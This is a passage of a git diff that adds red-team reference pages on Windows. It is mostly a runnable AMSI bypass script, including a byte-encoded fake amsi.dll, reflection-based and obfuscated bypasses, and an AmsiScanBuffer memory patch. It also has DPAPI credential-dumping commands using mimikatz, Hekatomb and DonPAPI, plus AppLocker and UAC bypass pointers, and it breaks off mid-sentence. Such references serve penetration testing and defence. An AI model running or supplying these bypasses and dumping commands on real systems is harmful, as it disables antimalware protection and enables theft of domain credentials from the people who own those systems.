114 101 103 105 115 116 101 114 95 111 110 101 120 105 116 95 102 117 110 99 116 105 111 110 0 34 0 95 101 120 101 99 117 116 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 30 0 95 99 114 116 95 97 116 101 120 105 116 0 22 0 95 99 101 120 105 116 0 0 97 112 105 45 109 115 45 119 105 110 45 99 114 116 45 114 117 110 116 105 109 101 45 108 49 45 49 45 48 46 100 108 108 0 174 4 82 116 108 67 97 112 116 117 114 101 67 111 110 116 101 120 116 0 181 4 82 116 108 76 111 111 107 117 112 70 117 110 99 116 105 111 110 69 110 116 114 121 0 0 188 4 82 116 108 86 105 114 116 117 97 108 85 110 119 105 110 100 0 0 146 5 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 0 82 5 83 101 116 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 15 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 0 112 5 84 101 114 109 105 110 97 116 101 80 114 111 99 101 115 115 0 0 112 3 73 115 80 114 111 99 101 115 115 111 114 70 101 97 116 117 114 101 80 114 101 115 101 110 116 0 48 4 81 117 101 114 121 80 101 114 102 111 114 109 97 110 99 101 67 111 117 110 116 101 114 0 16 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 73 100 0 20 2 71 101 116 67 117 114 114 101 110 116 84 104 114 101 97 100 73 100 0 0 221 2 71 101 116 83 121 115 116 101 109 84 105 109 101 65 115 70 105 108 101 84 105 109 101 0 84 3 73 110 105 116 105 97 108 105 122 101 83 76 105 115 116 72 101 97 100 0 106 3 73 115 68 101 98 117 103 103 101 114 80 114 101 115 101 110 116 0 75 69 82 78 69 76 51 50 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 50 162 223 45 153 43 0 0 205 93 32 210 102 212 255 255 255 255 255 255 0 0 0 0 1 0 0 0 2 0 0 0 47 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 16 0 0 65 16 0 0 48 37 0 0 68 16 0 0 148 16 0 0 16 38 0 0 148 16 0 0 191 17 0 0 52 37 0 0 192 17 0 0 66 18 0 0 96 37 0 0 68 18 0 0 76 19 0 0 164 37 0 0 76 19 0 0 160 19 0 0 144 37 0 0 160 19 0 0 221 19 0 0 72 38 0 0 224 19 0 0 20 20 0 0 24 38 0 0 20 20 0 0 229 20 0 0 212 37 0 0 232 20 0 0 89 21 0 0 220 37 0 0 92 21 0 0 149 21 0 0 16 38 0 0 152 21 0 0 184 21 0 0 16 38 0 0 184 21 0 0 205 21 0 0 16 38 0 0 208 21 0 0 248 21 0 0 16 38 0 0 248 21 0 0 13 22 0 0 16 38 0 0 16 22 0 0 113 22 0 0 144 37 0 0 116 22 0 0 164 22 0 0 16 38 0 0 164 22 0 0 184 22 0 0 16 38 0 0 184 22 0 0 1 23 0 0 24 38 0 0 4 23 0 0 205 23 0 0 32 38 0 0 208 23 0 0 108 24 0 0 232 37 0 0 108 24 0 0 144 24 0 0 24 38 0 0 144 24 0 0 187 24 0 0 24 38 0 0 188 24 0 0 11 25 0 0 24 38 0 0 12 25 0 0 35 25 0 0 16 38 0 0 36 25 0 0 208 25 0 0 44 38 0 0 252 25 0 0 23 26 0 0 16 38 0 0 32 26 0 0 101 27 0 0 56 38 0 0 104 27 0 0 178 27 0 0 72 38 0 0 180 27 0 0 254 27 0 0 72 38 0 0 8 28 0 0 201 29 0 0 88 38 0 0 80 30 0 0 82 30 0 0 104 38 0 0 82 30 0 0 105 30 0 0 136 37 0 0 105 30 0 0 133 30 0 0 136 37 0 0 133 30 0 0 187 30 0 0 204 37 0 0 187 30 0 0 211 30 0 0 8 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 54 0 0 0 73 0 0 0 76 0 0 0 11 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 24 0 0 0 24 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 48 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 72 0 0 0 96 96 0 0 125 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 60 63 120 109 108 32 118 101 114 115 105 111 110 61 39 49 46 48 39 32 101 110 99 111 100 105 110 103 61 39 85 84 70 45 56 39 32 115 116 97 110 100 97 108 111 110 101 61 39 121 101 115 39 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120 109 108 110 115 61 39 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 39 32 109 97 110 105 102 101 115 116 86 101 114 115 105 111 110 61 39 49 46 48 39 62 13 10 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 24 0 0 0 248 160 0 161 88 161 96 161 56 162 80 162 88 162 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" + + if (([IntPtr]::Size) -eq 8) + { + Write-Verbose "64 bit process detected." + $DllBytes = $AmsiX64 + } + elseif (([IntPtr]::Size) -eq 4) + { + Write-Verbose "32 bit process detected." + $DllBytes = $AmsiX86 + } + + switch($method) + { + + "unload" + { + Write-Verbose "Using Matt Graeber's Reflection method." + if ($ShowOnly -eq $True) + { + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output '[Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)' + } + else + { + Write-Output "Executing the bypass." + [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) + } + } + + "unloadsilent" + { + Write-Verbose "Using Matt Graeber's Reflection method with WMF5 autologging bypass." + if ($ShowOnly -eq $True) + { + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output '[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType(''System.Reflection.Bindin''+''gFlags'')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType(''System.T''+''ype'')), [Object]([Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'')),(''GetFie''+''ld'')).Invoke(''amsiInitFailed'',((''Non''+''Public,Static'') -as [String].Assembly.GetType(''System.Reflection.Bindin''+''gFlags''))).SetValue($null,$True)' + } + else + { + Write-Output "Executing the bypass." + [Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True) + } + } + + "unloadobfuscated" + { + Write-Verbose "Using Matt Graeber's Reflection method with obfuscation from Daneil Bohannon's Invoke-Obfuscation - which bypasses WMF5 autologging." + if ($ShowOnly -eq $True) + { + $code = @" +Sv ('R9'+'HYt') ( " ) )93]rahC[]gnirtS[,'UCS'(ecalpeR.)63]rahC[]gnirtS[,'aEm'(ecalpeR.)')eurt'+'aEm,llun'+'aEm(eulaVt'+'eS'+'.)UCScit'+'atS,ci'+'lbuPnoNUCS'+',U'+'CSdeli'+'aFt'+'inI'+'is'+'maUCS('+'dle'+'iF'+'teG'+'.'+')'+'UCSslitU'+'is'+'mA.noitamotu'+'A.tn'+'em'+'eganaM.'+'m'+'e'+'t'+'sySUCS(epy'+'TteG.ylbmessA'+'.]'+'feR['( (noisserpxE-ekovnI" ); Invoke-Expression( -Join ( VaRIAbLe ('R9'+'hyT') -val )[ - 1..- (( VaRIAbLe ('R9'+'hyT') -val ).Length)]) +"@ + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output $code + } + else + { + Write-Output "Executing the bypass." + Sv ('R9'+'HYt') ( " ) )93]rahC[]gnirtS[,'UCS'(ecalpeR.)63]rahC[]gnirtS[,'aEm'(ecalpeR.)')eurt'+'aEm,llun'+'aEm(eulaVt'+'eS'+'.)UCScit'+'atS,ci'+'lbuPnoNUCS'+',U'+'CSdeli'+'aFt'+'inI'+'is'+'maUCS('+'dle'+'iF'+'teG'+'.'+')'+'UCSslitU'+'is'+'mA.noitamotu'+'A.tn'+'em'+'eganaM.'+'m'+'e'+'t'+'sySUCS(epy'+'TteG.ylbmessA'+'.]'+'feR['( (noisserpxE-ekovnI" ); Invoke-Expression( -Join ( VaRIAbLe ('R9'+'hyT') -val )[ - 1..- (( VaRIAbLe ('R9'+'hyT') -val ).Length)]) + + } + } + + "unload2" + { + Write-Verbose "Using Matt Graeber's second Reflection method." + if ($ShowOnly -eq $True) + { + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output '[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiContext'',[Reflection.BindingFlags]''NonPublic,Static'').GetValue($null),0x41414141)' + } + else + { + Write-Output "Executing the bypass." + [Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141) + } + } + + "dllhijack" + { + Write-Verbose "Using Cornelis de Plaa's DLL hijack method." + if ($ShowOnly -eq $True) + { + Write-Output "Copy powershell.exe from C:\Windows\System32\WindowsPowershell\v1.0 to a local folder and dropa fake amsi.dll in the same directory." + Write-Output "Run the new powershell.exe and AMSI should be gone for that session." + } + else + { + [Byte[]] $temp = $DllBytes -split ' ' + Write-Output "Executing the bypass." + Write-Verbose "Dropping the fake amsi.dll to disk." + [System.IO.File]::WriteAllBytes("$pwd\amsi.dll", $temp) + + Write-Verbose "Copying powershell.exe to the current working directory." + Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $pwd + + Write-Verbose "Starting powershell.exe from the current working directory." + & "$pwd\powershell.exe" + + } + } + + "psv2" + { + Write-Verbose "Using PowerShell version 2 which doesn't support AMSI." + if ($ShowOnly -eq $True) + { + Write-Output "If .Net version 2.0.50727 is installed, run powershell -v 2 and run scripts from the new PowerShell process." + } + else + { + Write-Verbose "Checking if .Net version 2.0.50727 is installed." + $versions = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | Get-ItemProperty -name Version -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select -ExpandProperty Version + if($versions -match "2.0.50727") + { + Write-Verbose ".Net version 2.0.50727 found." + Write-Output "Executing the bypass." + powershell.exe -version 2 + } + else + { + Write-Verbose ".Net version 2.0.50727 not found. Can't start PowerShell v2." + } + } + } + + "obfuscation" + { + Write-Output "AMSI and the AVs which support it can be bypassed using obfuscation techqniues." + Write-Output "ISE-Steroids (http://www.powertheshell.com/isesteroidsmanual/download/) and Invoke-Obfuscation can be used (https://github.com/danielbohannon/Invoke-Obfuscation)." + } + } + +} +``` + + +## Adam Chester Patch + +Bypass Update by Adam Chester https://twitter.com/_xpn_/status/1170852932650262530 + +```ps1 +$Winpatch = @" +using System; +using System.Runtime.InteropServices; + +public class patch +{ + // https://twitter.com/_xpn_/status/1170852932650262530 + static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; + static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; + + public static void it() + { + if (is64Bit()) + PatchAmsi(x64); + else + PatchAmsi(x86); + } + + private static void PatchAmsi(byte[] patch) + { + try + { + var lib = Win32.LoadLibrary("a" + "ms" + "i.dll"); + var addr = Win32.GetProcAddress(lib, "AmsiScanBuffer"); + + uint oldProtect; + Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect); + + Marshal.Copy(patch, 0, addr, patch.Length); + Console.WriteLine("Patch Sucessfull"); + } + catch (Exception e) + { + Console.WriteLine(" [x] {0}", e.Message); + Console.WriteLine(" [x] {0}", e.InnerException); + } + } + + private static bool is64Bit() + { + bool is64Bit = true; + + if (IntPtr.Size == 4) + is64Bit = false; + + return is64Bit; + } +} + +class Win32 +{ + [DllImport("kernel32")] + public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); + + [DllImport("kernel32")] + public static extern IntPtr LoadLibrary(string name); + + [DllImport("kernel32")] + public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); +} +"@ + +Add-Type -TypeDefinition $Winpatch -Language CSharp +[patch]::it() +``` + +## Other interesting AMSI bypass + +* [tihanyin/PSSW100AVB/AMSI_bypass_2021_09.ps1](https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1) + ```ps1 + $A="5492868772801748688168747280728187173688878280688776828" + $B="1173680867656877679866880867644817687416876797271" + [Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " " ).GetField([string](38..51|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " ",'Non' + 'Public,Static').SetValue($null,$true) + ``` + +## AMSI.fail + +> AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures. - https://amsi.fail/ + + +## References + +* [S3cur3Th1sSh1t - Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/blob/master/README.md) \ No newline at end of file diff --git a/docs/redteam/Windows - DPAPI.md b/docs/redteam/Windows - DPAPI.md new file mode 100644 index 0000000..48252d6 --- /dev/null +++ b/docs/redteam/Windows - DPAPI.md @@ -0,0 +1,100 @@ +# Windows - DPAPI + +> On Windows, credentials saved in the Windows Credentials Manager are encrypted using Microsoft's Data Protection API and stored as "blob" files in user AppData folder. + +## Summary + +* [Data Protection API](#data-protection-api) + * [List Credential Files](#list-credential-files) + * [DPAPI LocalMachine Context](#dpapi-localmachine-context) + * [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) + * [Hekatomb - Steal all credentials on domain](#hekatomb---steal-all-credentials-on-domain) + * [DonPAPI - Dumping DPAPI credz remotely](#donpapi---dumping-dpapi-credz-remotely) + + +## Data Protection API + +* Outside of a domain: the user's `password hash` is used to encrypt these "blobs". +* Inside a domain: the `domain controller's master key` is used to encrypt these blobs. + +With the extracted private key of the domain controller, it is possible to decrypt all the blobs, and therefore to recover all the secrets recorded in the Windows identification manager of all the work +stations in the domain. + +```ps1 +vaultcmd /list + +VaultCmd /listcreds:| /all +vaultcmd /listcreds:"Windows Credentials" /all +``` + +### List Credential Files + +```ps1 +dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\ +dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\ + +Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\ +Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\ +``` + + +### DPAPI LocalMachine Context + +The `LocalMachine` context is used to protect data that is intended to be shared across different users or services on a single machine. This means that any user or service running on the machine can access the protected data with the appropriate credentials. + +In contrast, the `CurrentUser` context is used to protect data that is intended to be accessed only by the user who encrypted it, and cannot be accessed by other users or services on the same machine. + +```ps1 +$a = [System.Convert]::FromBase64String("AQAAANCMnd[...]") +$b = [System.Security.Cryptography.ProtectedData]::Unprotect($a, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine) +[System.Text.Encoding]::ASCII.GetString($b) +``` + + +### Mimikatz - Credential Manager & DPAPI + +```powershell +# check the folder to find credentials +dir C:\Users\\AppData\Local\Microsoft\Credentials\* + +# check the file with mimikatz +mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 +# find master key +mimikatz !sekurlsa::dpapi +# use master key +mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b + +# find and export backup keys +lsadump::backupkeys /system:dc01.lab.local /export +# use backup keys +dpapi::masterkey /in:"C:\Users\\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk +``` + +### Hekatomb - Steal all credentials on domain + +> [Processus-Thief/Hekatomb](https://github.com/Processus-Thief/HEKATOMB) is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers. Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials. + +```python +pip3 install hekatomb +hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp +``` + +![Data in memory](https://github.com/Processus-Thief/HEKATOMB/raw/main/.assets/github1.png) + +### DonPAPI - Dumping DPAPI credz remotely + +* [login-securite/DonPAPI](https://github.com/login-securite/DonPAPI) + +```ps1 +DonPAPI.py domain/user:passw0rd@target +DonPAPI.py --hashes : domain/user@target + +# using domain backup key +dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip +python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list +``` + +## References + +* [DPAPI - Extracting Passwords - HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) +* [DON PAPI, OU L’ART D’ALLER PLUS LOIN QUE LE DOMAIN ADMIN - LoginSecurité - CORTO GUEGUEN - 4 MARS 2022](https://www.login-securite.com/2022/03/04/don-papi-ou-lart-daller-plus-loin-que-le-avec-dpapi/) \ No newline at end of file diff --git a/docs/redteam/Windows - Defenses.md b/docs/redteam/Windows - Defenses.md new file mode 100644 index 0000000..d346323 --- /dev/null +++ b/docs/redteam/Windows - Defenses.md @@ -0,0 +1,421 @@ +# Windows - Defenses + +## Summary + +* [AppLocker](#applocker) +* [User Account Control](#user-account-control) +* [DPAPI](#dpapi) +* [Powershell](#powershell) + * [Anti Malware Scan Interface](#anti-malware-scan-interface) + * [Just Enough Administration](#just-enough-administration) + * [Contrained Language Mode](#constrained-language-mode) + * [Script Block Logging](#script-block-logging) +* [Protected Process Light](#protected-process-light) +* [Credential Guard](#credential-guard) +* [Event Tracing for Windows](#event-tracing-for-windows) +* [Windows Defender Antivirus](#windows-defender-antivirus) +* [Windows Defender Application Control](#windows-defender-application-control) +* [Windows Defender Firewall](#windows-defender-firewall) +* [Windows Information Protection](#windows-information-protection) + + +## AppLocker + +> AppLocker is a security feature in Microsoft Windows that provides administrators with the ability to control which applications and files users are allowed to run on their systems. The rules can be based on various criteria, such as the file path, file publisher, or file hash, and can be applied to specific users or groups. + +* Enumerate Local AppLocker Effective Policy + ```powershell + PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections + PowerView PS C:\> Get-AppLockerPolicy -effective -xml + Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe # (Keys: Appx, Dll, Exe, Msi and Script + ``` + +* AppLocker Bypass + * By default, `C:\Windows` is not blocked, and `C:\Windows\Tasks` is writtable by any users + * [api0cradle/UltimateAppLockerByPassList/Generic-AppLockerbypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md) + * [api0cradle/UltimateAppLockerByPassList/VerifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md) + * [api0cradle/UltimateAppLockerByPassList/DLL-Execution.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md) + + +## User Account Control + +UAC stands for User Account Control. It is a security feature introduced by Microsoft in Windows Vista and is present in all subsequent versions of the Windows operating system. UAC helps mitigate the impact of malware and helps protect users by asking for permission or an administrator's password before allowing changes to be made to the system that could potentially affect all users of the computer. + +* Check if UAC is enabled + ```ps1 + REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA + ``` +* Check UAC level + ``` + REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin + REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v FilterAdministratorToken + ``` + +| EnableLUA | LocalAccountTokenFilterPolicy | FilterAdministratorToken | Description | +|---|---|---|---| +| 0 | / | / | No UAC | +| 1 | 1 | / | No UAC | +| 1 | 0 | 0 | No UAC for RID 500 | +| 1 | 0 | 1 | UAC for Everyone | + + +* UAC Bypass + * [AutoElevated binary signed by Microsoft](https://www.elastic.co/guide/en/security/current/bypass-uac-via-sdclt.html) - `msconfig`, `sdclt.exe`, `eventvwr.exe`, etc + * [hfiref0x/UACME](https://github.com/hfiref0x/UACME) - Defeating Windows User Account 